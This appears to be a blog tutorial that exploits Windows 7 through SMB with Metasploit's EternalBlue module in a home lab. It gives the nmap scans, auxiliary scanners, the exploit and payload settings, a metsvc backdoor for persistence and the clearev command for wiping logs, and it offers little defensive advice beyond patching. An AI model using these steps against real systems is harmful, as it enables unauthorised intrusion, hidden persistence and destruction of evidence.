Microsoft Windows, An operating system loved by more than 80% of computer users in the world. What if I tell you that you love highly vulnerable operating systems? Yes, you heard it right, Your favorite OS i.e. Microsoft windows is a highly vulnerable OS. In this article, we will try to explore and exploit one of the most common vulnerabilities of windows.

Fun Fact: Fascinated with the term โ€œhackโ€? Hacking means making things easy but in today`s digital world, people use this term in a wrong manner.

Pre-Requisites

Metasploit

A Framework tool that automates the tasks involved in hacking or I should say Penetration testing. Preinstalled in Kali Linux. Most information security professionals prefer writing their own scripts.

Auxiliary

The module in Metasploit framework used for enumeration, scanning, fuzzing etc.

SMB

Server Message Block, A protocol running on the application layer allows us to share files between two OS within the network. SMB uses a client-server architecture to share files or even printers. Also known as Common Internet File System. SMB uses ports 139 and 445. We will be using port 445 for our SMB Pentesting

RHOST & RPORT

The IP address & port we choose to enter on the target machine.

Phases of hacking

Taking into consideration the approach to hack a particular machine we follow these steps:

  1. Reconnaissance:
  2. Scan target
  3. Get Access
  4. Maintain access
  5. Clear logs

So basically we as hackers or even pen tester try to not just exploit using payloads like many script-kiddie but enumerate the victim machine and gather as much info as possible.

SMB Pentesting with Metasploit Port 445

  1. IP Address of my attacker machine: 192.168.187.131
  2. IP address of my victim machine: 192.168.187.130
  3. In our case we had both on same network locally and we knew the address but still we followed a method which shows how an attacker and get the IP Address of a victim machine using nmap

SMB Pentesting, Steps to hack windows 7 using SMB port 445 via Metasploit

  • Reconnaissance, yes, hacking always starts with information gathering. So let us use nmap to discover the IP Address and open ports of the victim machine.
smb pentesting, use nmap to scan network though subnet mask
nmap 192.168.187.0/24
  • Once we discover all devices connected with the network, IP Address, and the open ports, we found the following ports on the victim machine: Port 135, 139, 445, 3389,5800, and 5900.
nmap scan ports
  • Lets try to know the services and their versions running on the remote machine we want to exploit.
nmap -sV 192.168.187.130
  • The results after running the above command are as follows.
nmap scan version of smb
  • Since we got port 445 open and the OS as windows 7 -10, service and version. Let us try to enumerate with scripts available in nmap. This enables us to find if the machine is vulnerable to some attacks related to that particular service.
nmap 192.168.187.130 โ€“script vuln -p445 //specifically for port 445

Although its up to you. If you want to scan all ports for vulnerabilities you can also use

nmap 192.168.187.130 โ€“script vuln
  • And here we go, the output clearly shows that we must try smb-vuln-ms17-010
smb vuln script port 445
  • So, let us now go into Metasploit and use the tools to understand the attacker machine more clearly.
sudo msfconsole
  • Till this stage, we have some information about the target including IP Address, ports, Vulnerable scripts. Let us now jump to the second step i.e. scan the network to enumerate more details.
  • We use auxiliary for SMB Pentesting. These auxiliary contain scripts that help to scan and enumerate information about vulnerabilities in the target. Type
Search auxiliary/scanner/smb.
metasploit search auxiliary smb
auxiliaries in metasploit
  • We can easily get the idea of what an auxiliary is about. Let us first try to enumerate the version by using smb_version
use auxiliary/scanner/smb/smb_version
options
set rhost 192.168.187.130
exploit
smb_version auxiliary
  • Boom, we got the operating system, version and smb version with name
  • Lets now go with another auxiliary i.e. smb_uninit_creds. It helps to check for uninitialized variable vulnerability. Use it with rhost and run exploit.
uninit_creds auxiliary testing
  • We found it safe. Lets try it with another auxiliary named ms17-010 (The one we got in nmap script)
  • The host is vulnerable to this. Wow, we also got the version i.e. windows 7 Ultimate 7601 SP1 64bit
auxiliary for ms17-010
  • We scanned multiple auxiliaries, you can go for more like lookupsid, login(to brute force the creds) etc.
  • Time to get access and maintain it. Let us try to find the exploit and payload.
Search ms17-010
ms17-010 exploits
  • The output shows 4 exploits including one for windows 8 onwords. So we got 3. Lets choose the first one i.e. eternal blue.
  • Going with the default payload check for options and set your RHOST.
default payload reverse tcp
  • BOOOOOOOMMMMM!!!!!!!!! We got meterpreter.
windows 7 meterpreter shell through smb pentesting eternalblue
  • Remember, we still require to maintain access for the future and clear all tracks and logs.
  • To maintain the access, the backdoor needs to be deployed. It enables us to connect even after the victim machine restarts. Meterpreter allows us to use metsvc for the purpose.
  • While to clear logs with Metasploit, just use a command
clearev

Congrats, you are now a pro hacker.

Fun Fact: A hacker group named shadow brokers leaked this in 2017. NSA used eternalblue to spy on other countries and even Microsoft was unaware of this for around 5 years

Knowing how to hack windows 7 using SMB vulnerability looks cool. Wait, don`t you feel, preventing the SMB attack is much more cool. Yes, its Indian scriptures say A savior is always greater than attacker

Here is how you can secure your windows from being hacked via SMB

Simple, update your operating systems to the latest version as Microsoft patched the vulnerability. Also keep all your software, utilities and applications updated

Learn about facebook hacking